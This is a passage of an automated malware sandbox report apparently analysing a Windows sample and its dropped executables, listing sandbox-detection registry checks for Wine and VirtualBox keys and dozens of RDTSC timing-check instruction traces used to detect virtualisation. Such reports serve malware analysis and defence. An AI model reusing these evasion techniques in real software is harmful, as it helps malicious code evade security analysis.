Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 50F293 second address: 50F299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 50F299 second address: 50F29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 687689 second address: 68769D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5380h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 687960 second address: 687966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 687966 second address: 687974 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FC3507E5376h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 687AB8 second address: 687AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68AE02 second address: 68AE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68AF67 second address: 68AF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC350C3E71Bh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68B0B0 second address: 68B0B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68B14D second address: 68B157 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68B157 second address: 68B15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 673688 second address: 67368C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 67368C second address: 67369D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8751 second address: 6A875D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC350C3E716h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8890 second address: 6A8896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8896 second address: 6A88A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FC350C3E716h 0x0000000d jnc 00007FC350C3E716h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A89FE second address: 6A8A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8A0F second address: 6A8A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8A13 second address: 6A8A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8CE4 second address: 6A8CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8DFA second address: 6A8E06 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3507E5376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8E06 second address: 6A8E4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FC350C3E716h 0x00000009 jmp 00007FC350C3E71Eh 0x0000000e pop esi 0x0000000f jc 00007FC350C3E71Ch 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c jmp 00007FC350C3E729h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8E4A second address: 6A8EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 jmp 00007FC3507E5384h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC3507E537Ah 0x00000014 jmp 00007FC3507E537Fh 0x00000019 popad 0x0000001a jns 00007FC3507E537Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8EA8 second address: 6A8EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8EAE second address: 6A8EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A91B1 second address: 6A91C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A9362 second address: 6A9392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5388h 0x00000008 jo 00007FC3507E5376h 0x0000000e jnl 00007FC3507E5376h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FC3507E5376h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A9392 second address: 6A9396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6AA460 second address: 6AA466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6AA466 second address: 6AA46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6ADB4C second address: 6ADB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6ADB50 second address: 6ADB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6AE282 second address: 6AE294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jp 00007FC3507E5376h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B539A second address: 6B539E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B4B21 second address: 6B4B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC3507E5381h 0x0000000f popad 0x00000010 push ecx 0x00000011 jo 00007FC3507E5376h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B4B46 second address: 6B4B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B4F90 second address: 6B4FB5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC3507E5376h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC3507E5378h 0x00000012 popad 0x00000013 js 00007FC3507E538Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FC3507E5376h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8917 second address: 6B8926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8926 second address: 6B8945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jl 00007FC3507E5376h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop edi 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8945 second address: 6B89A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FC350C3E718h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007FC350C3E719h 0x00000027 jmp 00007FC350C3E71Eh 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f jnp 00007FC350C3E716h 0x00000035 jmp 00007FC350C3E728h 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B89A9 second address: 6B89DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jns 00007FC3507E538Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 je 00007FC3507E5380h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B89DF second address: 6B89FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E71Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8C9B second address: 6B8CA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8CA1 second address: 6B8CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC350C3E716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B9565 second address: 6B956B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B956B second address: 6B956F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B956F second address: 6B9585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b mov si, FEF0h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B9585 second address: 6B9598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B9A89 second address: 6B9AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BA009 second address: 6BA00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BA744 second address: 6BA748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BA748 second address: 6BA74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BC3EC second address: 6BC3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E537Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BDD8C second address: 6BDD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BDD90 second address: 6BDDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jnp 00007FC3507E5376h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BDDA5 second address: 6BDDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BCB5F second address: 6BCB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BFDEE second address: 6BFE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E724h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 67A0EB second address: 67A0EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C1989 second address: 6C199D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E720h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C467C second address: 6C4682 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C4682 second address: 6C46B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC350C3E71Eh 0x0000000b jmp 00007FC350C3E729h 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5C52 second address: 6C5C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5C56 second address: 6C5C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5C5C second address: 6C5C9C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC3507E5378h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+12478FDCh] 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 sbb ch, FFFFFF87h 0x00000019 add dword ptr [ebp+122D2156h], edi 0x0000001f popad 0x00000020 sbb bx, A31Dh 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D1FDDh] 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push edx 0x00000031 jmp 00007FC3507E537Ch 0x00000036 pop edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5C9C second address: 6C5CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5CA2 second address: 6C5CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C6EE2 second address: 6C6EE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C6EE8 second address: 6C6EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C6EEC second address: 6C6F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FC350C3E71Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C9A3E second address: 6C9A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C9C42 second address: 6C9C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CAC47 second address: 6CAC51 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC3507E537Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CBCF6 second address: 6CBD00 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CAC51 second address: 6CACE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D23FFh], ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FC3507E5378h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov edi, 0358694Fh 0x00000033 movsx ebx, ax 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d movzx edi, di 0x00000040 mov eax, dword ptr [ebp+122D127Dh] 0x00000046 call 00007FC3507E5383h 0x0000004b pushad 0x0000004c je 00007FC3507E5376h 0x00000052 mov dx, BCF0h 0x00000056 popad 0x00000057 pop edi 0x00000058 mov ebx, 48D2F867h 0x0000005d push FFFFFFFFh 0x0000005f jmp 00007FC3507E537Dh 0x00000064 nop 0x00000065 jmp 00007FC3507E537Ah 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push ebx 0x0000006e pushad 0x0000006f popad 0x00000070 pop ebx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CBD00 second address: 6CBD5E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC350C3E71Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC350C3E718h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov bl, 14h 0x00000029 push 00000000h 0x0000002b clc 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FC350C3E718h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c pushad 0x0000004d popad 0x0000004e pop eax 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CACE6 second address: 6CACEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CACEC second address: 6CACF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
